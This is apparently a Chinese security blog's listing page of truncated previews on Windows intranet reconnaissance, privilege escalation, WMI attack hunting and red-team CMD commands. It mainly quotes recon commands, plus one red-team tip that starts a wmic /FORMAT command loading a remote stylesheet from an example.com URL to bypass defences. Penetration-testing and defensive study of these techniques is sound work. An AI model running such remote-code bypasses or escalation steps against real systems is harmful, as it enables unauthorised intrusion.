“A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践。”...
内网单台Windows主机信息收集小结
点击蓝字 关注我们免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权...
内网笔记·windwos提权(上)
提权的常用方法windows的常用提权方法,主要分为漏洞提权、windwos特性提权、第三方组件提权,数据库提权 ftp提权等提权的常用命令systeminfo | findstr OS #获取系统版...
Windows信息收集、渗透测试常用命令
简介Windows中虽然可视化非常完善,但我们在渗透过程中很多时候只能调用目标命令行,无法使用可视化界面。Windows主机在渗透过程中主要有两大类,一个是工作组模式,一个是域模式,点击查看->...
关于Windows提权小结
Windows内核溢出漏洞提权 Windows内核溢出漏洞提权通过系统本身存在的一些漏洞,未曾打相应的补丁而暴露出来的提权方法,依托可以提升权限的EXP和它们的补丁编号,进行提升权限说白了,就是信息收...
Windows | WMI攻击利用痕迹猎捕
WMI (Windows Management Instrumentation) 是 Microsoft 对 WBEM 标准的实现。WMI 开箱即用,提...
Windows提权辅助脚本
文章前言进入到后渗透阶段就涉及到了提权,而提权的第一步就是信息收集,所以这个脚本因此而诞生~辅助脚本windows提权用到的命令:systeminfonet usernet user user1ipc...
关键证据检索提取-系统用户审查
STATEMENT声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此...
渗透测试信息收集自动化脚本
项目地址https://github.com/gysf666/wmic_infowmic_info:渗透测试信息收集自动化脚本执行脚本后,会将信息写入一个HTML文件中wmic_info网盘下载链接:...
什么?你还不会本机信息收集?
感谢大家对李趴菜一直以来的支持和热爱,2022也是疫情的第三年,兄弟/姐妹们也陪伴李趴菜走过了五个月的应届生生涯,或许兄弟/姐妹们对我的评价有失落有欣喜...
Hacking with Style, Stylesheets
前言前段时间,@subTee放了一个好玩的red team tips,利用wmic来进行bypass。正文命令如下wmic os get /FORMAT:”https://example.com/ev...
红队的基础CMD命令
系统信息版本和补丁信息wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #获取架构systeminfosysteminfo | f...
5